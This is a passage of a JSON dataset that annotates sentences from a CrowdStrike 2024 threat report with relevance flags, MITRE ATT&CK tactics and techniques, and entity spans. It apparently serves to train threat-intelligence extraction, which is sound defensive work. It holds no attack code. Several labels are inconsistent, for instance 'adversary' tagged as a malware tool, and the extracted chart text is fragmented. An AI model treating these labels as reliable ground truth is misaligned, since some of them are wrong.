null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s31-c33f3d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 31, "context_before": "Their activity continued to focus on financial gain via cryptocurrency theft and intelligence collection from South Korean and Western organizations, specifically in the academic, aerospace, defense, government, manufacturing, media and technology sectors.", "sentence_text": "Across the rest of the world, stealth played a key role in adversary activity focused on digital surveillance, information collection and control in support of government agendas.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s32-136737", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 32, "context_before": "Across the rest of the world, stealth played a key role in adversary activity focused on digital surveillance, information collection and control in support of government agendas.", "sentence_text": "In some cases, this activity was assisted by private sector offensive actors and openly available adversary emulation frameworks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s33-f9d195", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 33, "context_before": "In some cases, this activity was assisted by private sector offensive actors and openly available adversary emulation frameworks.", "sentence_text": "One of the greatest threat actor motivations driving stealth in cyber threat operations is CrowdStrike’s development of new products and partnerships throughout 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s34-bffc90", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 34, "context_before": "One of the greatest threat actor motivations driving stealth in cyber threat operations is CrowdStrike’s development of new products and partnerships throughout 2023.", "sentence_text": "These changed the stakes within the operational landscape and » left adversaries with no place to hide.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s35-7a8592", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 35, "context_before": "These changed the stakes within the operational landscape and » left adversaries with no place to hide.", "sentence_text": "MOTIVATIONS TO 232.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s36-76df3b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 36, "context_before": "MOTIVATIONS TO 232.", "sentence_text": "TRACKS MORE THAN 130 ACTIVE MALICIOUS ACTIVITY CLUSTERS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s37-4ae90c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 37, "context_before": "TRACKS MORE THAN 130 ACTIVE MALICIOUS ACTIVITY CLUSTERS.", "sentence_text": "In addition to named adversaries, CrowdStrike CAO tracks more than 130 active malicious activity clusters.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s38-2abeb5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 38, "context_before": "In addition to named adversaries, CrowdStrike CAO tracks more than 130 active malicious activity clusters.", "sentence_text": "captures new cyber threat developments in real time and identifies and tracks new adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s39-20a72c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 39, "context_before": "captures new cyber threat developments in real time and identifies and tracks new adversaries.", "sentence_text": "The CrowdStrike 2024 Global Threat Report sheds light on the standout trends from last year, how adversaries’ activities and motivations are evolving and the ways CrowdStrike anticipates the threat landscape will evolve in the coming year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p7-s40-735b88", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 7, "sentence_id": 40, "context_before": "The CrowdStrike 2024 Global Threat Report sheds light on the standout trends from last year, how adversaries’ activities and motivations are evolving and the ways CrowdStrike anticipates the threat landscape will evolve in the coming year.", "sentence_text": "CAO Innovations\nTHE CROWDSTRIKE CAO TEAM PUTS RAPID INSIGHTS INTO THE HANDS OF FRONT-LINE TEAMS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p7-s41-92c2a3", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 7, "sentence_id": 41, "context_before": "CAO Innovations\nTHE CROWDSTRIKE CAO TEAM PUTS RAPID INSIGHTS INTO THE HANDS OF FRONT-LINE TEAMS", "sentence_text": "SO THEY CAN DISRUPT ADVERSARIES FASTER THAN EVER BEFORE.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p7-s42-9db2a8", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 7, "sentence_id": 42, "context_before": "SO THEY CAN DISRUPT ADVERSARIES FASTER THAN EVER BEFORE.", "sentence_text": "WITH CROWDSTRIKE FALCON® IDENTITY THREAT PROTECTION AND ELITE CAO THREAT HUNTERS TO QUICKLY IDENTIFY AND REMEDIATE COMPROMISED CREDENTIALS, TRACK LATERAL MOVEMENT AND STAY AHEAD OF ADVERSARIES WITH 24/7 COVERAGE.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p7-s43-b1137c", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 7, "sentence_id": 43, "context_before": "WITH CROWDSTRIKE FALCON® IDENTITY THREAT PROTECTION AND ELITE CAO THREAT HUNTERS TO QUICKLY IDENTIFY AND REMEDIATE COMPROMISED CREDENTIALS, TRACK LATERAL MOVEMENT AND STAY AHEAD OF ADVERSARIES WITH 24/7 COVERAGE.", "sentence_text": "AND WHILE THE CAO TEAM HUNTS FOR ADVERSARY ACTIVITY INSIDE CUSTOMER ORGANIZATIONS, THE NEW CAO “EXTERNAL ATTACK SURFACE EXPLORE” CAPABILITY ENABLES CUSTOMERS TO HUNT FOR AND EXAMINE ADVERSARY INFRASTRUCTURE.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p7-s44-9fe14f", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 7, "sentence_id": 44, "context_before": "AND WHILE THE CAO TEAM HUNTS FOR ADVERSARY ACTIVITY INSIDE CUSTOMER ORGANIZATIONS, THE NEW CAO “EXTERNAL ATTACK SURFACE EXPLORE” CAPABILITY ENABLES CUSTOMERS TO HUNT FOR AND EXAMINE ADVERSARY INFRASTRUCTURE.", "sentence_text": "CUSTOMERS IMMEDIATELY TAKE ACTION ON CAO-IDENTIFIED THREATS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p7-s45-218212", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 7, "sentence_id": 45, "context_before": "CUSTOMERS IMMEDIATELY TAKE ACTION ON CAO-IDENTIFIED THREATS.", "sentence_text": "VIA FALCON IDENTITY THREAT PROTECTION, CROWDSTRIKE INTRODUCED NEW AUTOMATED WORKFLOWS FOR RESETTING CUSTOMER PASSWORDS EXPOSED ON THE CRIMINAL UNDERGROUND; ONE-CLICK TYPOSQUATTING DOMAIN BLOCKING AND TAKEDOWN; AND NEW CROWDSTRIKE FALCON® FUSION PLAYBOOKS FOR AUTOMATIC INDICATORS OF COMPROMISE (IOCS) RESULTING FROM TYPOSQUATTING THREATS AND THIRD-PARTY SYSTEM INTEGRATION.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p7-s46-2bc4d6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 7, "sentence_id": 46, "context_before": "VIA FALCON IDENTITY THREAT PROTECTION, CROWDSTRIKE INTRODUCED NEW AUTOMATED WORKFLOWS FOR RESETTING CUSTOMER PASSWORDS EXPOSED ON THE CRIMINAL UNDERGROUND; ONE-CLICK TYPOSQUATTING DOMAIN BLOCKING AND TAKEDOWN; AND NEW CROWDSTRIKE FALCON® FUSION PLAYBOOKS FOR AUTOMATIC INDICATORS OF COMPROMISE (IOCS) RESULTING FROM TYPOSQUATTING THREATS AND THIRD-PARTY SYSTEM INTEGRATION.", "sentence_text": "THESE NEW ENHANCEMENTS ALLOW USERS TO QUICKLY RESPOND TO THREATS THROUGHOUT THEIR SECURITY WORKFLOWS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p7-s47-f5652b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 7, "sentence_id": 47, "context_before": "THESE NEW ENHANCEMENTS ALLOW USERS TO QUICKLY RESPOND TO THREATS THROUGHOUT THEIR SECURITY WORKFLOWS.", "sentence_text": "SO CUSTOMERS CAN EASILY LEVERAGE A SINGLE, CONSISTENT USER INTERFACE TO VIEW CRUCIAL INFORMATION ACROSS ALL CAO CAPABILITIES.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p8-s48-94de83", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 8, "sentence_id": 48, "context_before": "SO CUSTOMERS CAN EASILY LEVERAGE A SINGLE, CONSISTENT USER INTERFACE TO VIEW CRUCIAL INFORMATION ACROSS ALL CAO CAPABILITIES.", "sentence_text": "Adversary Nation-State or Category BEAR RUSSIA BUFFALO VIETNAM CHOLLIMA DPRK (NORTH KOREA) CONVENTIONS CRANE ROK (REPUBLIC OF KOREA)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p8-s49-8dfb02", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 8, "sentence_id": 49, "context_before": "Adversary Nation-State or Category BEAR RUSSIA BUFFALO VIETNAM CHOLLIMA DPRK (NORTH KOREA) CONVENTIONS CRANE ROK (REPUBLIC OF KOREA)", "sentence_text": "HAWK SYRIA NAMING JACKAL HACKTIVIST KITTEN IRAN LEOPARD PAKISTAN LYNX GEORGIA OCELOT COLOMBIA PANDA PEOPLE’S REPUBLIC", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p8-s50-3f80e2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 8, "sentence_id": 50, "context_before": "HAWK SYRIA NAMING JACKAL HACKTIVIST KITTEN IRAN LEOPARD PAKISTAN LYNX GEORGIA OCELOT COLOMBIA PANDA PEOPLE’S REPUBLIC", "sentence_text": "OF CHINA SPHINX EGYPT SPIDER", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p8-s51-912efc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 8, "sentence_id": 51, "context_before": "OF CHINA SPHINX EGYPT SPIDER", "sentence_text": "ECRIME TIGER INDIA WOLF TURKEY", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p9-s52-044cfa", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 9, "sentence_id": 52, "context_before": "ECRIME TIGER INDIA WOLF TURKEY", "sentence_text": "Threat\nLandscape\nyear over year = (YoY)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p9-s53-0a9dc1", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 9, "sentence_id": 53, "context_before": "Threat\nLandscape\nyear over year = (YoY)", "sentence_text": "Overview +34 232 110% 34 new adversaries tracked by Cloud-conscious cases increased 75% 76% Cloud environment intrusions increased 76% YoY increase in victims named on by 75% YoY eCrime dedicated leak sites 84% 84% of adversary-attributed cloud-conscious intrusions were focused on eCrime", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p10-s54-e74101", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 10, "sentence_id": 54, "context_before": "Overview +34 232 110% 34 new adversaries tracked by Cloud-conscious cases increased 75% 76% Cloud environment intrusions increased 76% YoY increase in victims named on by 75% YoY eCrime dedicated leak sites 84% 84% of adversary-attributed cloud-conscious intrusions were focused on eCrime", "sentence_text": "Today’s cyber threats are particularly alarming due to the widespread use of hands-on or “interactive intrusion” techniques, which involve adversaries actively executing actions on a host to accomplish their objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p10-s55-853e48", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 10, "sentence_id": 55, "context_before": "Today’s cyber threats are particularly alarming due to the widespread use of hands-on or “interactive intrusion” techniques, which involve adversaries actively executing actions on a host to accomplish their objectives.", "sentence_text": "Unlike malware attacks that depend on the deployment of malicious tooling and scripts, interactive intrusions leverage the creativity and problem-solving skills of human adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p10-s56-cf89da", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 10, "sentence_id": 56, "context_before": "Unlike malware attacks that depend on the deployment of malicious tooling and scripts, interactive intrusions leverage the creativity and problem-solving skills of human adversaries.", "sentence_text": "These individuals can mimic expected user and administrator behavior, making it difficult for defenders to differentiate between legitimate user activity and a cyberattack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p10-s57-eea0c0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 10, "sentence_id": 57, "context_before": "These individuals can mimic expected user and administrator behavior, making it difficult for defenders to differentiate between legitimate user activity and a cyberattack.", "sentence_text": "The technology sector was the most frequently targeted industry in which CrowdStrike CAO observed interactive intrusion activity in 2023, a continuing trend from 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p10-s58-bb38c0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 10, "sentence_id": 58, "context_before": "The technology sector was the most frequently targeted industry in which CrowdStrike CAO observed interactive intrusion activity in 2023, a continuing trend from 2022.", "sentence_text": "The charts below reflect the relative frequency of intrusions in the top 10 industry verticals and in geographical regions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p10-s59-805d01", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 10, "sentence_id": 59, "context_before": "The charts below reflect the relative frequency of intrusions in the top 10 industry verticals and in geographical regions.", "sentence_text": "Interactive Intrusions by Region 6% 61% 11% 5% 7% NORTH AMERICA 1% EUROPE SOUTH ASIA 5% EAST ASIA 4% SOUTH AMERICA MIDDLE EAST OCEANIA AFRICA Interactive Intrusions by Industry 23% 15% 13% 9% 9% 8% 8% 6% 4% 4% TECHNOLOGY TELECOMMUNICATIONS FINANCIAL GOVERNMENT RETAIL MANUFACTURING HEALTHCARE SERVICES EDUCATION MEDIA After gaining initial access to a network, adversaries seek to “break out” and move laterally from the compromised host to other hosts within the environment.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": null, "procedure": "After gaining initial access, adversaries move laterally from a compromised host to other hosts in the network.", "entities": [ { "text": "adversaries", "start": 361, "end": 372, "label": "ThreatActor" }, { "text": "move laterally from the compromised host to other hosts within the environment", "start": 397, "end": 475, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p10-s60-1d8695", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 10, "sentence_id": 60, "context_before": "Interactive Intrusions by Region 6% 61% 11% 5% 7% NORTH AMERICA 1% EUROPE SOUTH ASIA 5% EAST ASIA 4% SOUTH AMERICA MIDDLE EAST OCEANIA AFRICA Interactive Intrusions by Industry 23% 15% 13% 9% 9% 8% 8% 6% 4% 4% TECHNOLOGY TELECOMMUNICATIONS FINANCIAL GOVERNMENT RETAIL MANUFACTURING HEALTHCARE SERVICES EDUCATION MEDIA After gaining initial access to a network, adversaries seek to “break out” and move laterally from the compromised host to other hosts within the environment.", "sentence_text": "The time it takes for them to do this — “breakout time” — is crucial because the initially compromised machines are rarely the ones adversaries need to achieve their goals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p10-s61-c0d015", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 10, "sentence_id": 61, "context_before": "The time it takes for them to do this — “breakout time” — is crucial because the initially compromised machines are rarely the ones adversaries need to achieve their goals.", "sentence_text": "They must move laterally into the network, conduct reconnaissance, establish persistence and locate their targets.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" }, { "id": "T1087", "name": "Account Discovery" } ], "procedure": "Adversaries move laterally into the network, conduct reconnaissance, establish persistence, and locate targets.", "entities": [ { "text": "move laterally into the network", "start": 10, "end": 41, "label": "Action" }, { "text": "conduct reconnaissance", "start": 43, "end": 65, "label": "Action" }, { "text": "establish persistence", "start": 67, "end": 88, "label": "Action" }, { "text": "locate their targets", "start": 93, "end": 113, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p10-s62-f75244", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 10, "sentence_id": 62, "context_before": "They must move laterally into the network, conduct reconnaissance, establish persistence and locate their targets.", "sentence_text": "Responding within the breakout time window allows defenders to mitigate costs and other damages associated with intrusions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p10-s63-b5b6ff", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 10, "sentence_id": 63, "context_before": "Responding within the breakout time window allows defenders to mitigate costs and other damages associated with intrusions.", "sentence_text": "The fastest observed breakout time was only 2 minutes and 7 seconds.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s64-66f7c3", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 64, "context_before": "The fastest observed breakout time was only 2 minutes and 7 seconds.", "sentence_text": "Anatomy of an eCrime Interactive Intrusion To gain a better understanding of interactive intrusions, the following timeline illustrates the speed of a real-world hands-on attack:\nBrute Force Drops Drops Two Drops", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s65-87ab99", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 65, "context_before": "Anatomy of an eCrime Interactive Intrusion To gain a better understanding of interactive intrusions, the following timeline illustrates the speed of a real-world hands-on attack:\nBrute Force Drops Drops Two Drops", "sentence_text": "Discovery Opens Falcon Adversary Attack Legitimate File Discovery Ransomware – Tool Run Is Control Adversary Exits QUARANTINE ON Tools", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s66-287cb7", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 66, "context_before": "Discovery Opens Falcon Adversary Attack Legitimate File Discovery Ransomware – Tool Run Is Control Adversary Exits QUARANTINE ON Tools", "sentence_text": "Never Runs It Blocked Panel OverWatch WRITE POLICY IS OFF Alert Adversary 31 SECONDS 2 MINUTES 2 MINUTES 4 MINUTES 15 MINUTES 55 SECONDS 57 SECONDS 38 SECONDS Gains Legitimate Credentials Login Intrusion Attack Disrupted:\nBegins > OVERWATCH SEES POTENTIAL BRUTE FORCE 39 MINUTES >", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s67-10e898", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 67, "context_before": "Never Runs It Blocked Panel OverWatch WRITE POLICY IS OFF Alert Adversary 31 SECONDS 2 MINUTES 2 MINUTES 4 MINUTES 15 MINUTES 55 SECONDS 57 SECONDS 38 SECONDS Gains Legitimate Credentials Login Intrusion Attack Disrupted:\nBegins > OVERWATCH SEES POTENTIAL BRUTE FORCE 39 MINUTES >", "sentence_text": "OVERWATCH SEES SUSPICIOUS FILES DROPPED > FALCON SENSOR BLOCKS AND QUARANTINES DISCOVERY TOOL Falcon Adversary OverWatch Response:\n> HOST NETWORK ISOLATED", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s68-9225d5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 68, "context_before": "OVERWATCH SEES SUSPICIOUS FILES DROPPED > FALCON SENSOR BLOCKS AND QUARANTINES DISCOVERY TOOL Falcon Adversary OverWatch Response:\n> HOST NETWORK ISOLATED", "sentence_text": "The adversary executed a legitimate tool to obtain system information for reconnaissance and then dropped three more files, including ransomware, onto the system.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "adversary executed a tool to obtain system info and dropped files that include ransomware", "entities": [ { "text": "adversary ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "executed ", "start": 14, "end": 23, "label": "Action" }, { "text": " obtain system information", "start": 43, "end": 69, "label": "Action" }, { "text": "dropped ", "start": 98, "end": 106, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s69-26e79e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 69, "context_before": "The adversary executed a legitimate tool to obtain system information for reconnaissance and then dropped three more files, including ransomware, onto the system.", "sentence_text": "They attempted to execute a network discovery and reconnaissance tool MALWARE-FREE to map out lateral movement options, which was immediately blocked and ACTIVITY quarantined by the Falcon sensor.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1018", "name": "Remote System Discovery" } ], "procedure": "adversaries attempted to execute network discovery and reconnaissance tool", "entities": [ { "text": "attempted ", "start": 5, "end": 15, "label": "Action" }, { "text": "execute a network discovery", "start": 18, "end": 45, "label": "MalwareTool" }, { "text": " reconnaissance tool", "start": 49, "end": 69, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s70-712eca", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 70, "context_before": "They attempted to execute a network discovery and reconnaissance tool MALWARE-FREE to map out lateral movement options, which was immediately blocked and ACTIVITY quarantined by the Falcon sensor.", "sentence_text": "This caused the adversary to open the control panel to understand which security tool was in use.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1518.001", "name": "Security Software Discovery" } ], "procedure": "adversary opened control panel to know which security too was used", "entities": [ { "text": "adversary ", "start": 16, "end": 26, "label": "MalwareTool" }, { "text": "open the control panel", "start": 29, "end": 51, "label": "Action" }, { "text": "security tool was in use", "start": 72, "end": 96, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s71-d2c92e", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 71, "context_before": "This caused the adversary to open the control panel to understand which security tool was in use.", "sentence_text": "When they identified the Falcon platform, they never attempted to execute the second discovery tool or the ransomware (which would have been prevented and » quarantined) and moved to another victim.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s72-1953bc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 72, "context_before": "When they identified the Falcon platform, they never attempted to execute the second discovery tool or the ransomware (which would have been prevented and » quarantined) and moved to another victim.", "sentence_text": "Once an initial compromise occurs, it only takes seconds for adversaries to 71% drop tools and/or malware on a victim’s environment during an interactive 2021 intrusion.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "adversaries drop tools and/or malware on victim environment", "entities": [ { "text": "adversaries ", "start": 61, "end": 73, "label": "MalwareTool" }, { "text": " drop tools and/or malware", "start": 79, "end": 105, "label": "Action" }, { "text": "victim’s environment", "start": 111, "end": 131, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s73-73ebfd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 73, "context_before": "Once an initial compromise occurs, it only takes seconds for adversaries to 71% drop tools and/or malware on a victim’s environment during an interactive 2021 intrusion.", "sentence_text": "However, the saying “time is money” holds true for adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s74-e355f0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 74, "context_before": "However, the saying “time is money” holds true for adversaries.", "sentence_text": "62% More than 88% of the attack time was dedicated to breaking in and gaining initial access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s75-4b71fa", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 75, "context_before": "62% More than 88% of the attack time was dedicated to breaking in and gaining initial access.", "sentence_text": "By reducing or eliminating this time, adversaries free up 2020 resources to conduct more attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p11-s76-155383", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 11, "sentence_id": 76, "context_before": "By reducing or eliminating this time, adversaries free up 2020 resources to conduct more attacks.", "sentence_text": "51% To do this, they have continued to move beyond malware to faster, more 2019 40% effective means such as identity attacks (phishing, social engineering and access brokers) and the exploitation of vulnerabilities and trusted relationships.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" }, { "id": "T1566", "name": "Phishing" } ], "procedure": "actors used identity attacks, exploitation of vulnerabilities", "entities": [ { "text": "they ", "start": 16, "end": 21, "label": "ThreatActor" }, { "text": "identity attacks (phishing, social engineering and access brokers)", "start": 108, "end": 174, "label": "Action" }, { "text": "exploitation of vulnerabilities", "start": 183, "end": 214, "label": "Action" }, { "text": "trusted relationships", "start": 219, "end": 240, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p12-s77-71fe4b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 12, "sentence_id": 77, "context_before": "51% To do this, they have continued to move beyond malware to faster, more 2019 40% effective means such as identity attacks (phishing, social engineering and access brokers) and the exploitation of vulnerabilities and trusted relationships.", "sentence_text": "This trend is partly related to the success of identity attacks, access brokers and the prolific abuse of valid credentials to facilitate access and persistence in victim environments.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "access brokers abused valid credentials", "entities": [ { "text": "access brokers", "start": 65, "end": 79, "label": "ThreatActor" }, { "text": "identity attacks", "start": 47, "end": 63, "label": "Action" }, { "text": "valid credentials", "start": 106, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "victim environments", "start": 164, "end": 183, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p12-s78-e274dd", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 12, "sentence_id": 78, "context_before": "This trend is partly related to the success of identity attacks, access brokers and the prolific abuse of valid credentials to facilitate access and persistence in victim environments.", "sentence_text": "Access brokers are threat actors who acquire access to organizations and provide or sell this access to other actors, including ransomware operators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p12-s79-e2bca5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 12, "sentence_id": 79, "context_before": "Access brokers are threat actors who acquire access to organizations and provide or sell this access to other actors, including ransomware operators.", "sentence_text": "These adversaries continued to profit from providing initial access to a variety of eCrime threat actors in 2023, with the number of accesses advertised increasing by almost 20% compared to 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p12-s80-d3128d", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 12, "sentence_id": 80, "context_before": "These adversaries continued to profit from providing initial access to a variety of eCrime threat actors in 2023, with the number of accesses advertised increasing by almost 20% compared to 2022.", "sentence_text": "Access Broker Advertisements by Month Month JAN 150 FEB 89", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p12-s81-0cbf63", "source": "crowdstrike", 